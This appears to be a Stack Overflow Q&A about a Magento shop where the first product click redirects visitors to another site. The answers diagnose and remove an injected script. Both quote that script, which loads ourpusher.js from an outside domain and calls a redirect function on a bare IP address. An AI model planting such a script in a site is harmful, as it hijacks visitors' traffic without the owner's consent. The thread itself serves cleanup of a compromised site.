# Click on product it will automatically redirect another site

Tags: javascript, magento-1.9

I have one issue in Magento e-commerce web site. When I click on any product first time it will redirect to another site.  When I click second time in that product or any other product it will redirect to product view page. Google Web Master Tools does not get any types of malware. I can not get proper solution for this. Is it Magento related problem or other hosting related problem?

Click [here](http://www.makeupshades.com/) to open site.

Comment: We need to see some code to be able to help.

Comment: @LGSon http://www.makeupshades.com <-- this is site url.

Comment: Check this link: https://blog.sucuri.net/2015/04/impacts-of-a-hack-on-a-magento-ecommerce-website.html

Comment: @LGSon i will check cc.php file

Answer (score 1, accepted):

This script inserted into your page header is causing that behaviour.

```
<script src="http://www.onesteptowin.com/js/ourpusher.js" type="text/javascript"></script> <script type="text/javascript"> var params = {tr: 0, clicks_num: 1}; wpOurpusher("http://46.22.211.96/?062c",params); </script>
```

I assume this is a hack, but it might also be part of a plug-in who require you to run those adverts as part of their terms.

Unpatched sites and third party plug-ins are usually the way these things get on a site.

Comment: this code placed in  `System > Configuration > Design > HTML Head > Miscellaneous Scripts`

Answer (score 1):

I was also facing the same issue in Magento, where first click on website was redirecting me on another website.In my case script was injected to my database in `core_config_data` table.I resolved it by removing script from database.Steps are as follows :-

1. Open Table core_config_data
2. Find the below script in `Values` column
   `<script src="http://www.onesteptowin.com/js/ourpusher.js" type="text/javascript"></script> <script type="text/javascript"> var params = {tr: 0, clicks_num: 1}; wpOurpusher("http://46.22.211.96/?062c",params); </script>`
3. Delete that particular row.
4. Clear Magento Cache.
5. Cheers!!! You are Done :)

> Note :- Take the backup of `core_config_data` table before making
>   changes.